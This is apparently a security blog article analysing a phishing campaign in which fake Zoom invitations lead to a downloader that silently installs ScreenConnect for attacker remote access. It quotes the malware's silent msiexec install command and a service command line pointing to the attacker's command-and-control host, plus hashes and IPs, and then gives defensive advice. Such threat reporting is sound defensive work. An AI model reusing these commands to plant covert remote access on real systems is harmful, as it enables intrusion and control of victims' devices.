Malicious Fake Zoom Clients Can Grant Attackers Full Access to Your Device

As remote work continues to proliferate in the post-pandemic world, collaboration tools like Zoom, Microsoft Teams, and WebEx have become integral to daily business operations.

However, this widespread adoption has also attracted cybercriminals, who are exploiting trust in these platforms through sophisticated phishing campaigns.

One alarming example involves fake Zoom meeting invitations that deliver malware capable of granting attackers complete remote access to the victim’s computer.

Technical Analysis: How the Attack Works

Step 1: The Lure—Fake Zoom Invitation

The attack starts with a convincing email that mimics a legitimate Zoom meeting invitation. The message typically includes a “Join” button, enticing recipients to participate in an urgent or important video call often a tactic used to evoke a rapid, unthinking response.

Step 2: The Trap—Malicious Download

Clicking the “Join” button redirects the user to a website that, while seemingly benign, prompts the visitor to download and install the “latest Zoom client.” Instead of the genuine application, the user receives an executable file—Session.ClientSetup.exe.

File Details

• Name: Session.ClientSetup.exe
• SHA256: f5e467939f8367d084154e1fefc87203e26ec711dbfa83217308e4f2be9d58be

This file is a downloader a lightweight program designed specifically to retrieve further malicious payloads.

Step 3: The Payload Remote Access Trojan Deployment

Once executed, the downloader drops and installs a secondary MSI package using the built-in Windows installer service (msiexec.exe). The dropped file is:

shellC:\Users\admin\AppData\Local\Temp\ScreenConnect\25.2.4.9229\84cae30d9bf18843\ScreenConnect.ClientSetup.msi

It is then installed silently with:

shell"C:\Windows\System32\msiexec.exe" /i "C:\Users\admin\AppData\Local\Temp\ScreenConnect\25.2.4.9229\84cae30d9bf18843\ScreenConnect.ClientSetup.msi"

This package installs ScreenConnect (now known as ConnectWise Control), a legitimate remote administration tool frequently abused in cyberattacks for stealthy remote control.

Step 4: Persistence and Command & Control

After installation, the attacker configures the tool for persistence by registering it as a Windows service:

shell"C:\Program Files (x86)\ScreenConnect Client (84cae30d9bf18843)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=tqtw21aa.anondns.net&p=8041&s=6c9715c2-054f-49cc-b888-4084388fc1c5&..."

C2 Server:

• Domain: tqtw21aa.anondns.net
• IP: 151.242.63.139
• Port: 8041

The infected device then connects to the attacker’s Command & Control (C2) server, granting full remote access, file transfer, and system control capabilities.

Defending Against These Threats

Best Practices:

• Always verify meeting invitations and downloads—install collaboration software only from official websites.
• Educate staff about common phishing tactics that leverage urgency and fear.
• Maintain updated anti-malware solutions and enable endpoint detection and response (EDR) mechanisms.
• Monitor for unusual installations or new services, especially those referencing remote administration tools.

In Case of Infection:

• Immediately disconnect the compromised device from the network.
• Conduct a forensic investigation to determine the extent of access or data exfiltration.
• Reset credentials and reimage affected systems if necessary.

Cybercriminals are constantly evolving their attack methods, but awareness and robust security hygiene remain our best defenses. As remote work and digital collaboration persist, so too must our vigilance against the next fake client download with real consequences.